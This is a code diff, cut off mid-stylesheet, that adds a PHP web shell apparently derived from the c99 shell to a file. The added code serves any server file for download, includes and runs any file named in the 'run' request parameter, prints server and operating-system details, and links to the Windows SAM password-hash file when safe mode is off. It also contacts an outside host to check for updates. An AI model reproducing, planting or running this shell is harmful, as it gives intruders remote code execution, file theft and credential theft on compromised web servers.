+$extn = $file_info['extension'];
+
+
+if (isset($_GET['dir'])) {
+ $images = array(
+"download"=>
+"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
+"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
+"ext_wri"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"small_dir"=>
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
+"dir"=>"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAAkFBMVEX////MmTT/zGezgRvLmDN/
+f3/AjSi6hyK9iiWgbghra2vCjyr/5oGufBbHlC+jcQuwfhiIiIjJljGcagS1gh24hSCebAaZZwGa
+aAK0gRzvvFfcqUT4xWC8iSRKSkqreRPCwsK/jCeodhDms06lcw23hB/ToDv/1G//4HvFki3/64X/
+95Fqamr//////5n/9I54UBIWAAAAAXRSTlMAQObYZgAAAAFiS0dELc3aQT0AAAAWdEVYdFNvZnR3
+YXJlAGdpZjJwbmcgMi40LjakM4MXAAAAiUlEQVR42oXOxxKCMBgE4CWhVwEp9i4Ekt/3fzuDE0Yd
+D3633dnDAr8su0i/stKi40cmTfnebckXU2GPj8k0U0mui2KIxYu7q1acA2kv1CxWWQ7RWTTbUhAi
+YjaNxppqCZcJGowLlRI+O1FvbKiV8FhFnXGnJgT0n+RwvmZBXbbN3tFPHPnm4L8nl3EWVP90I8IA
+AAAASUVORK5CYII=",
+"o.b" => "/9j/4AAQSkZJRgABAgAAZABkAAD/7AARRHVja3kAAQAEAAAAUAAA/+IMWElDQ19QUk9GSUxFAAEB
+AAAMSExpbm8CEAAAbW50clJHQiBYWVogB84AAgAJAAYAMQAAYWNzcE1TRlQAAAAASUVDIHNSR0IA
+AAAAAAAAAAAAAAEAAPbWAAEAAAAA0y1IUCAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAARY3BydAAAAVAAAAAzZGVzYwAAAYQAAABsd3RwdAAAAfAAAAAUYmtw
+dAAAAgQAAAAUclhZWgAAAhgAAAAUZ1hZWgAAAiwAAAAUYlhZWgAAAkAAAAAUZG1uZAAAAlQAAABw
+ZG1kZAAAAsQAAACIdnVlZAAAA0wAAACGdmlldwAAA9QAAAAkbHVtaQAAA/gAAAAUbWVhcwAABAwA
+AAAkdGVjaAAABDAAAAAMclRSQwAABDwAAAgMZ1RSQwAABDwAAAgMYlRSQwAABDwAAAgMdGV4dAAA
+AABDb3B5cmlnaHQgKGMpIDE5OTggSGV3bGV0dC1QYWNrYXJkIENvbXBhbnkAAGRlc2MAAAAAAAAA
+EnNSR0IgSUVDNjE5NjYtMi4xAAAAAAAAAAAAAAASc1JHQiBJRUM2MTk2Ni0yLjEAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFhZWiAAAAAAAADzUQABAAAA
+ARbMWFlaIAAAAAAAAAAAAAAAAAAAAABYWVogAAAAAAAAb6IAADj1AAADkFhZWiAAAAAAAABimQAA
+t4UAABjaWFlaIAAAAAAAACSgAAAPhAAAts9kZXNjAAAAAAAAABZJRUMgaHR0cDovL3d3dy5pZWMu
+Y2gAAAAAAAAAAAAAABZJRUMgaHR0cDovL3d3dy5pZWMuY2gAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZGVzYwAAAAAAAAAuSUVDIDYxOTY2LTIuMSBEZWZhdWx0
+IFJHQiBjb2xvdXIgc3BhY2UgLSBzUkdCAAAAAAAAAAAAAAAuSUVDIDYxOTY2LTIuMSBEZWZhdWx0
+IFJHQiBjb2xvdXIgc3BhY2UgLSBzUkdCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRlc2MAAAAAAAAA
+LFJlZmVyZW5jZSBWaWV3aW5nIENvbmRpdGlvbiBpbiBJRUM2MTk2Ni0yLjEAAAAAAAAAAAAAACxS
+ZWZlcmVuY2UgVmlld2luZyBDb25kaXRpb24gaW4gSUVDNjE5NjYtMi4xAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAB2aWV3AAAAAAATpP4AFF8uABDPFAAD7cwABBMLAANcngAAAAFYWVogAAAAAABM
+CVYAUAAAAFcf521lYXMAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAKPAAAAAnNpZyAAAAAAQ1JU
+IGN1cnYAAAAAAAAEAAAAAAUACgAPABQAGQAeACMAKAAtADIANwA7AEAARQBKAE8AVABZAF4AYwBo
+AG0AcgB3AHwAgQCGAIsAkACVAJoAnwCkAKkArgCyALcAvADBAMYAywDQANUA2wDgAOUA6wDwAPYA
++wEBAQcBDQETARkBHwElASsBMgE4AT4BRQFMAVIBWQFgAWcBbgF1AXwBgwGLAZIBmgGhAakBsQG5
+AcEByQHRAdkB4QHpAfIB+gIDAgwCFAIdAiYCLwI4AkECSwJUAl0CZwJxAnoChAKOApgCogKsArYC
+wQLLAtUC4ALrAvUDAAMLAxYDIQMtAzgDQwNPA1oDZgNyA34DigOWA6IDrgO6A8cD0wPgA+wD+QQG
+BBMEIAQtBDsESARVBGMEcQR+BIwEmgSoBLYExATTBOEE8AT+BQ0FHAUrBToFSQVYBWcFdwWGBZYF
+pgW1BcUF1QXlBfYGBgYWBicGNwZIBlkGagZ7BowGnQavBsAG0QbjBvUHBwcZBysHPQdPB2EHdAeG
+B5kHrAe/B9IH5Qf4CAsIHwgyCEYIWghuCIIIlgiqCL4I0gjnCPsJEAklCToJTwlkCXkJjwmkCboJ
+zwnlCfsKEQonCj0KVApqCoEKmAquCsUK3ArzCwsLIgs5C1ELaQuAC5gLsAvIC+EL+QwSDCoMQwxc
+DHUMjgynDMAM2QzzDQ0NJg1ADVoNdA2ODakNww3eDfgOEw4uDkkOZA5/DpsOtg7SDu4PCQ8lD0EP
+Xg96D5YPsw/PD+wQCRAmEEMQYRB+EJsQuRDXEPURExExEU8RbRGMEaoRyRHoEgcSJhJFEmQShBKj
+EsMS4xMDEyMTQxNjE4MTpBPFE+UUBhQnFEkUahSLFK0UzhTwFRIVNBVWFXgVmxW9FeAWAxYmFkkW
+bBaPFrIW1hb6Fx0XQRdlF4kXrhfSF/cYGxhAGGUYihivGNUY+hkgGUUZaxmRGbcZ3RoEGioaURp3
+Gp4axRrsGxQbOxtjG4obshvaHAIcKhxSHHscoxzMHPUdHh1HHXAdmR3DHeweFh5AHmoelB6+Hukf
+Ex8+H2kflB+/H+ogFSBBIGwgmCDEIPAhHCFIIXUhoSHOIfsiJyJVIoIiryLdIwojOCNmI5QjwiPw
+JB8kTSR8JKsk2iUJJTglaCWXJccl9yYnJlcmhya3JugnGCdJJ3onqyfcKA0oPyhxKKIo1CkGKTgp
+aymdKdAqAio1KmgqmyrPKwIrNitpK50r0SwFLDksbiyiLNctDC1BLXYtqy3hLhYuTC6CLrcu7i8k
+L1ovkS/HL/4wNTBsMKQw2zESMUoxgjG6MfIyKjJjMpsy1DMNM0YzfzO4M/E0KzRlNJ402DUTNU01
+hzXCNf02NzZyNq426TckN2A3nDfXOBQ4UDiMOMg5BTlCOX85vDn5OjY6dDqyOu87LTtrO6o76Dwn
+PGU8pDzjPSI9YT2hPeA+ID5gPqA+4D8hP2E/oj/iQCNAZECmQOdBKUFqQaxB7kIwQnJCtUL3QzpD
+fUPARANER0SKRM5FEkVVRZpF3kYiRmdGq0bwRzVHe0fASAVIS0iRSNdJHUljSalJ8Eo3Sn1KxEsM
+S1NLmkviTCpMcky6TQJNSk2TTdxOJU5uTrdPAE9JT5NP3VAnUHFQu1EGUVBRm1HmUjFSfFLHUxNT
+X1OqU/ZUQlSPVNtVKFV1VcJWD1ZcVqlW91dEV5JX4FgvWH1Yy1kaWWlZuFoHWlZaplr1W0VblVvl
+XDVchlzWXSddeF3JXhpebF69Xw9fYV+zYAVgV2CqYPxhT2GiYfViSWKcYvBjQ2OXY+tkQGSUZOll
+PWWSZedmPWaSZuhnPWeTZ+loP2iWaOxpQ2maafFqSGqfavdrT2una/9sV2yvbQhtYG25bhJua27E
+bx5veG/RcCtwhnDgcTpxlXHwcktypnMBc11zuHQUdHB0zHUodYV14XY+dpt2+HdWd7N4EXhueMx5
+KnmJeed6RnqlewR7Y3vCfCF8gXzhfUF9oX4BfmJ+wn8jf4R/5YBHgKiBCoFrgc2CMIKSgvSDV4O6
+hB2EgITjhUeFq4YOhnKG14c7h5+IBIhpiM6JM4mZif6KZIrKizCLlov8jGOMyo0xjZiN/45mjs6P
+No+ekAaQbpDWkT+RqJIRknqS45NNk7aUIJSKlPSVX5XJljSWn5cKl3WX4JhMmLiZJJmQmfyaaJrV
+m0Kbr5wcnImc951kndKeQJ6unx2fi5/6oGmg2KFHobaiJqKWowajdqPmpFakx6U4pammGqaLpv2n
+bqfgqFKoxKk3qamqHKqPqwKrdavprFys0K1ErbiuLa6hrxavi7AAsHWw6rFgsdayS7LCszizrrQl
+tJy1E7WKtgG2ebbwt2i34LhZuNG5SrnCuju6tbsuu6e8IbybvRW9j74KvoS+/796v/XAcMDswWfB
+48JfwtvDWMPUxFHEzsVLxcjGRsbDx0HHv8g9yLzJOsm5yjjKt8s2y7bMNcy1zTXNtc42zrbPN8+4
+0DnQutE80b7SP9LB00TTxtRJ1MvVTtXR1lXW2Ndc1+DYZNjo2WzZ8dp22vvbgNwF3IrdEN2W3hze
+ot8p36/gNuC94UThzOJT4tvjY+Pr5HPk/OWE5g3mlucf56noMui86Ubp0Opb6uXrcOv77IbtEe2c
+7ijutO9A78zwWPDl8XLx//KM8xnzp/Q09ML1UPXe9m32+/eK+Bn4qPk4+cf6V/rn+3f8B/yY/Sn9
+uv5L/tz/bf///+4AJkFkb2JlAGTAAAAAAQMAFQQDBgoNAAARtgAAF0YAABuaAAAgJv/bAIQAAgIC
+AgICAgICAgMCAgIDBAMCAgMEBQQEBAQEBQYFBQUFBQUGBgcHCAcHBgkJCgoJCQwMDAwMDAwMDAwM
+DAwMDAEDAwMFBAUJBgYJDQsJCw0PDg4ODg8PDAwMDAwPDwwMDAwMDA8MDAwMDAwMDAwMDAwMDAwM
+DAwMDAwMDAwMDAwM/8IAEQgAHgK8AwERAAIRAQMRAf/EALsAAQACAwEBAAAAAAAAAAAAAAADBQIE
+BgEHAQEAAAAAAAAAAAAAAAAAAAAAEAACAgMBAQADAQEBAAAAAAAAEwQFAiIDARQREhWAIyQRAAAE
+BQIDBwMBBwUAAAAAAAABAgMx0ZMENBEhEhMzQVFhkZLS4nGBIuEQQKGxYmMUMkKiIyQSAQAAAAAA
+AAAAAAAAAAAAAIATAAIBAgYDAAIDAQEAAAAAAAERACFRMUFhodHxEHGR8IFQgMGxMP/aAAwDAQAC
+EQMRAAAB+DlmAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADmDnDbAAAAAAAAANg+hkJr
+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
+kASVTK8FiNrM/AhGUmWFC84tGEEIJ5RFIeaZNEkqJGAtGH9aGVEkQK9iYINvSQJEWxHx2GpQBhIZ
+Bwa5prvsetQWpqEgLI4+OzcwGApE5roM4Eu/YDCCBAMieFfBZSsOoDACQEHAbkYf0IZUWIX6nQJO
+w62AFEGLNU+OxSbDMMAANgOKD/1AqpAOSsWwMaELlEEQCYKpJE9qwuJkvAWgb+ClcKADkz4Up5Qz
+TxEJQAcyJrvsqBdIAhhBpJzmdAkR8IeVKsg9DCCV0agEguPOgXgsWiK8GNikQ4KIUpBfAIBQg4hg
+UfXgsdzaMhkEYAkEs+4YONNACBEVI48oB1UQAmcCjixmu+zXfZrvs132a77Nd9mu+zXfZrvs132a
+77Nd9mu+zXfZrvs132a77M4vHcD0bsgCNLS0tLS0tLS0tLS0tLS0tLS0tIQCaCCAiIIRIYxgGAAE
+DASu6kMCYrUEwf3KKyAa4AFNgEfJ07XjXnEUNgCkGnjzgoF87YASAqpafa6qSEAUEPAOQwIwUTBq
+M4GXOYNycAq0VeCVEHAwaqASwJA3vKOkSCoKklVYxMho3wRgMTBArTKiAKJDmW1ZMYNg04tgNRQA
+GRfqJaO7aLDIEaRCItkwsQioJeCRUlgMCuoUccoQc7MHmIirHwSa3ykQMExEkVRUH0VJkoAfoePN
+LB4gFFJyQcCcfBIXbhwohAYUGGRgsMQ9QNhxcYrSACA4olyporJJQTAYmCrSWztEgkcivHkkjWVT
+KECVLCNI5BU2AAEisiJBB8eTTWGAFQEBAOhizrgQGlgEml44rQwwYrgUMIDTlBFQzCyW1RRpsEBM
+llACB+vB1rBwQDohIMs84NBEfCBQcNho4ThDyEQUlvwUCNLS0tLS0tLS0tLS0tLS0tLS32X3K0CG
+YwXud1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1
+yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3
+XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yn
+dcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcpi/Yhm9z//2gAI
+AQIDAT8Q/rB//9oACAEDAwE/EP6wf//Z");
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  echo base64_decode($images[$_GET['pic']]);
+}
+
+$ps=str_replace("\\","/",getenv('DOCUMENT_ROOT'));
+//file_array
+$file_tps=array(
+"img"=>array("jpg","bmp","gif","ico"),
+"act" => array("edit","copy","download","delete"),
+"zip" => array("gzip","zip","rar")
+);
+$surl_autofill_include = true; //If true then search variables with descriptors (URLs) and save it in SURL.
+
+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
+if (empty($surl))
+{
+ $surl = "?".$includestr; //Self url
+}
+$surl = htmlspecialchars($surl);
+ @ob_clean();
+//end
+if (isset($_GET['img'])) {
+   for ($i=0;$i<4;$i++) {
+     if (preg_match("/".$file_tps["img"][$i]."/i",$extn)) {
+    header("Content-type: ".$inf["mime"]);
+    readfile(urldecode($filename));
+    exit;
+
+     }
+ }
+}
+
+
+if (!function_exists(download)) {
+   function download($file) {
+   header('Pragma: anytextexeptno-cache', true);
+      header('Content-type: application/force-download');
+          header('Content-Transfer-Encoding: Binary');
+              header('Content-length: '.filesize($file));
+                  header('Content-disposition: attachment;
+                      filename='.basename($file));
+                          readfile($file);
+                          exit;
+   }
+}
+if (isset($_GET['download'])) {
+download($filename);
+exit;
+}
+
+if (isset($_GET['run'])) {
+echo urldecode($_GET['file']);
+include(urldecode($_GET['file']));
+exit;
+}
+
+
+function check_update() 
+{
+$cur_ver=5; //very important value for updates!Please dont change!
+$newer=$cur_ver+1;
+$url="http://dc3.dl.am/";
+$file=@fopen($url."".$newer.".txt","r") or die ("No updates aviable!");
+$text=fread($file,1000000);
+if (preg_match("/ver=".$newer."/i", $text)) {
+   echo "[+]Update Aviable!...Please download new version from:";
+echo "<br><a href=".$url.$newer.".txt>Version ".$newer."</a>";
+} }
+
+function get_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner["read"] = ($mode & 00400)?"r":"-";
+ $owner["write"] = ($mode & 00200)?"w":"-";
+ $owner["execute"] = ($mode & 00100)?"x":"-";
+ $group["read"] = ($mode & 00040)?"r":"-";
+ $group["write"] = ($mode & 00020)?"w":"-";
+ $group["execute"] = ($mode & 00010)?"x":"-";
+ $world["read"] = ($mode & 00004)?"r":"-";
+ $world["write"] = ($mode & 00002)? "w":"-";
+ $world["execute"] = ($mode & 00001)?"x":"-";
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+
+echo  $type.join("",$owner).join("",$group).join("",$world);
+}
+
+
+
+if (!function_exists(get_space)) {
+   function get_space($dir) {
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_f = @round(48.7/($all/$free),2);
+echo "".$used_f."";
+     }
+ }
+$sys=strtolower(substr(PHP_OS,0,3));
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+
+  <thead>
+    <tr><td>";
+echo "<img  src=".$surl."?&".$word."&dir&pic=o.b height= width=>";
+echo getenv('SERVER_SOFTWARE');
+echo "<br>";
+echo getenv('SERVER_NAME');
+echo ":";
+echo getenv('SERVER_PORT');
+echo "<br>";
+echo getenv('SERVER_ADMIN');
+
+if ($sys=="win") {
+echo "Windows";
+echo "<br>";
+echo  "".getenv('COMPUTERNAME')."";
+echo "<br>";
+echo "Os:".getenv('OS')."";
+} else {
+echo "<br>Linux";
+}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+$safe=1;
+echo "<br><font color=red>ON (secure)</font>";
+ } else {
+$save=2;
+if ($sys=="win") {
+echo "<br><font color=green><a href=".$surl."?&".$word."&file_browser&file=C:/Windows/repair/sam&download>Off (not secure)</a></font>";
+}
+}
+if (isset($_GET['file']))  {
+echo "<br>Access:";
+if (@is_readable($j_f)) {
+   echo "R";
+}
+if (@is_executable($j_f)) {
+ echo "E";
+}
+if (@is_writable($j_d)) {
+echo "W";
+}
+echo "<br>Current_file:";
+echo "<a href=".$surl."?&".$word."&file_browser&file=";
+echo urlencode($p) ;
+echo ">".$p."</a>";
+ }
+echo "<br>";
+echo "Start_dir:";
+echo "&ensp;&ensp;&ensp;";
+echo "<a href=".$surl."?&".$word."&file_browser&file=";
+echo urlencode($ps);
+echo ">".$ps."</a>";
+echo "<br>";
+if (isset($_GET['file'])) {
+echo "Free Space:";
+get_space(urldecode($_GET['file']));
+
+echo "gb";
+}
+echo "</td>";
+?>
+
+<style type="text/css">
+body { background-color:#8B8989;font-family:trebuchet Ms; color:black }
+
+textarea {
+border-top-width: 1px; 
+font-weight: bold; 
+border-left-width: 1px; 
+font-size: 10px; 
+border-left-color: #8B8989; 
+background:#8B8989; 
+border-bottom-width: 1px; 
+border-bottom-color:#8B8989; 
+color: black; 
+border-top-color:#8B8989; 
